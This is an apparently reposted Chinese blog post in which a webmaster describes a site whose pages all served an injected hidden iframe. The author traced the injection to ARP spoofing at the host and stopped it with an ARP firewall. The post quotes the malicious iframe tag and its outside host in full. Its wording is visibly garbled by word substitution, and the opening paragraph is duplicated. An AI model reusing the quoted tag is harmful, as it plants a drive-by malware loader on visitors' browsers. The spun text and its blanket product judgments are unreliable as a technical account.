昨天晚上11点多了。正要睡觉,突然一个网友电话过来了。说网页吧出问题,被挂马了。我一听吓了一大跳!马上起床! 我进入网页吧一访问,真的挂马了,全部网页都有马出现<iframe src=http://s82mnl12.cn/cn4.htm width=50 height=0 border=0></iframe> ,然后
昨天晚上11点多了。正要睡觉,忽然一个网友电话过来了。说网页吧出问题,被挂马了。我一听吓了一大跳!立刻起床!
我进入网页吧一拜访,真的挂马了,悉数网页都有马呈现<iframe src=http://s82mnl12.cn/cn4.htm width=50 height=0 border=0></iframe> ,然后立刻登陆服务器,看源代码,晕了。没有发现有挂马的痕迹.为了怕影响网页吧的用户,先把网页吧这个网站停了.
立刻问QQ上的几个做服务器的高手朋友,发现悉数网页挂了个马,可是我翻开网页看源文件却没有,怎么回事情?后来知道网页里没有 拜访有马,阐明机房内有ARP进犯,装 360安全卫士 有ARP防火墙 !
没管了.立刻装置360,一提示,果然是ARP进犯,然后翻开网页吧拜访,抑郁.仍是有木马.立刻封闭.这儿我要说一句,360的ARP几乎便是废物,根本没用的。千万别用。用和没用是相同的!不过查出了ARP进犯的人的网卡地址.
然后深夜联络机房,告知他们APR进犯的网卡,没用.那机房的说是新技术,不会查IP.不明白,要明日.我超抑郁!
没方法自己持续.持续网上找软件,找到了金山ARP防火墙,需求的能够去网页吧下。假如你也被进犯的话。一装置,然后翻开.没问题了。彻底防护!最重要的是这个东西免费啊。
朋友总结:这个ARP进犯 不是代码的问题 是服务器输出后,通过网关的时分被加了代码 所以网页里是没有代码的 是被其他机器假充了网关 转发修改了数据!
总算解决问题了,一看表清晨2点30了.一同3个小时!触目惊心啊!
假如站长你的站被挂马了,而在源代码里没有发现木马,你就应该置疑是不是ARP进犯了。最直接的方法是告知机房,要他们拨进犯的人的线.第二个方法便是装置金山arp防火墙!
金山arp防火墙下载: http://www./ruanjian/anquan/200806/6616.html(转文章的朋友这个金山arp防火墙下载的衔接别去掉了,由于很多人都需求这个软件,第二我打字也不容易,算是给我点点流量吧)
知优网 » 服务器一切网站悉数挂马,触目惊心3个小时!(网站首页被挂马)
